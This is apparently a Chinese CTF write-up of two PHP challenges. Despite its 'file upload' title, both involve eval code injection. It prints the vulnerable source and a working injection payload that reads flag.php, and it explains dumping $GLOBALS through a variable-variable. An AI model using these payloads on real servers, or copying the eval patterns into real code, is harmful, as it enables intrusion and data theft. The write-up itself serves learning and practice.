典型的檔案上傳漏洞
阿新 • • 發佈:2018-12-23
案例一
URL:http://120.24.86.145:8003/
程式碼
<?php include "waf.php"; include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>
其實就是拼接eval
可構造如下語句:
1);print_r(file(flag.php));//
到了程式碼裡就是
eval( "var_dump(1);print_r(file(flag.php));//);");
案例二
URL: http://120.24.86.145:8004/index1.php
flag In the variable ! <?php
error_reporting(0);// 關閉php錯誤顯示
include "flag1.php";// 引入flag1.php檔案程式碼
highlight_file(__file__);
if(isset($_GET['args'])){// 通過get方式傳遞 args變數才能執行if裡面的程式碼
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){// 這個正則表示式的意思是匹配任意 [A-Za-z0-9_] 的字元,就是任意大小寫字母和0到9以及下劃線組成
die("args error!");
}
eval("var_dump($$args);");// 這邊告訴我們這題是程式碼審計的題目
}
?>
這個可以注意一下eval很明顯$$.首先他說如果不符合那個正則就die。\w的意思是所有的字母。也就是說$args必須要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");